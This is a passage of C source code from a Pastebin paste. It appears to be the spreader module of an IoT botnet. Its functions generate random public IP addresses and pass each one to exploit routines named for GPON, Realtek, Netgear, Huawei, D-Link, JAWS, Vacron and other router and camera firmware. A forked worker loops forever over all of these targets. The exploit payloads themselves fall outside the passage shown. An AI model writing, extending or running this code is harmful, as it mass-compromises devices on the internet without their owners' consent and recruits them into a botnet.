  442.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  443.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  444.    
  445.     sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  446.     sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  447.     sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  448.     sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  449.     sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  450.    
  451.     exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);
  452.     exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);
  453. }
  454.  
  455. void HUAWEI_IPGen()
  456. {  
  457.     char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};
  458.  
  459.     srand(time(NULL));
  460.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  461.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  462.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  463.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  464.    
  465.     sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  466.     sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  467.     sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);
  468.    
  469.     exploit_socket_huawei(huawei_ip1);
  470.     exploit_socket_huawei(huawei_ip2);
  471.     exploit_socket_huawei(huawei_ip3);
  472.     exploit_socket_huawei(huawei_ip4);
  473.     exploit_socket_huawei(huawei_ip5);
  474. }
  475.  
  476. void TR064_IPGen()
  477. {  
  478.     char tr_ip1[16] = {0};
  479.  
  480.     srand(time(NULL));
  481.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  482.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  483.    
  484.     sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  485.    
  486.     exploit_socket_tr064(tr_ip1);
  487. }
  488.  
  489. void HNAP_IPGen()
  490. {  
  491.     char hnap_ip1[16] = {0};
  492.  
  493.     srand(time(NULL));
  494.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  495.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  496.    
  497.     sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  498.    
  499.     exploit_socket_hnap(hnap_ip1);
  500. }
  501.  
  502. void CROSSWEB_IPGen()
  503. {  
  504.     char crossweb_ip1[16] = {0};
  505.  
  506.     srand(time(NULL));
  507.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  508.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  509.    
  510.     sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  511.    
  512.     exploit_socket_crossweb(crossweb_ip1);
  513. }
  514.  
  515. void JAWS_IPGen()
  516. {  
  517.     char jaws_ip1[16] = {0};
  518.  
  519.     srand(time(NULL));
  520.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  521.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  522.    
  523.     sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  524.    
  525.     exploit_socket_jaws(jaws_ip1);
  526. }
  527.  
  528. void DLINK_IPGen()
  529. {  
  530.     char dlink_ip1[16] = {0};
  531.  
  532.     srand(time(NULL));
  533.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  534.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  535.    
  536.     sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  537.    
  538.     exploit_socket_dlink(dlink_ip1);
  539. }
  540.  
  541. void R7000_IPGen()
  542. {  
  543.     char r7000_ip1[16] = {0};
  544.  
  545.     srand(time(NULL));
  546.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  547.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  548.    
  549.     sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  550.    
  551.     exploit_socket_r7064(r7000_ip1);
  552. }
  553.  
  554. void VARCON_IPGen()
  555. {  
  556.     char varcon_ip1[16] = {0};
  557.  
  558.     srand(time(NULL));
  559.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  560.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  561.    
  562.     sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  563.    
  564.     exploit_socket_vacron(varcon_ip1);
  565. }
  566.  
  567. void exploit_worker(void)
  568. {  
  569.     int i = 0;
  570.     exploit_pid = fork();
  571.    
  572.     if (exploit_pid > 0 || exploit_pid == -1)
  573.         return;
  574.     restart:
  575.     i++;
  576.     if (i > 10)
  577.     {
  578.         printf("[Pwn] Sleeping For 12 Seconds\n");
  579.         sleep(12);
  580.         i = i - 10;
  581.         goto restart;
  582.     }
  583.         usleep(300000);
  584.         GPON8080_IPGen();
  585.         usleep(300000);
  586.         GPON80_IPGen();
  587.         usleep(300000);
  588.         REALTEK_IPGen();
  589.         usleep(300000);
  590.         NETGEAR_IPGen();
  591.         usleep(300000);
  592.         HUAWEI_IPGen();
  593.         usleep(300000);
  594.         TR064_IPGen();
  595.         usleep(300000);
  596.         HNAP_IPGen();
  597.         usleep(300000);
  598.         CROSSWEB_IPGen();
  599.         usleep(300000);
  600.         JAWS_IPGen();
  601.         usleep(300000);
  602.         DLINK_IPGen();
  603.         usleep(300000);
  604.         R7000_IPGen();
  605.         usleep(300000);
  606.         VARCON_IPGen();
  607.         goto restart;
  608. }
  609.  
  610. void exploit_kill(void)
  611. {
  612.     kill(exploit_pid, 9);
  613. }
  614.  
  615. int main(int argc, char const *argv[])
  616. {
  617.     exploit_worker();
  618.     char prev = 0;
  619.     while(1)
  620.         {
  621.             char c = getchar();
  622.             if(c == '\n' && prev == c)
  623.             {
  624.             // double return pressed!
  625.                 break;
  626.             }
  627.             prev = c;
  628.         }
  629.     return 0;
  630. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top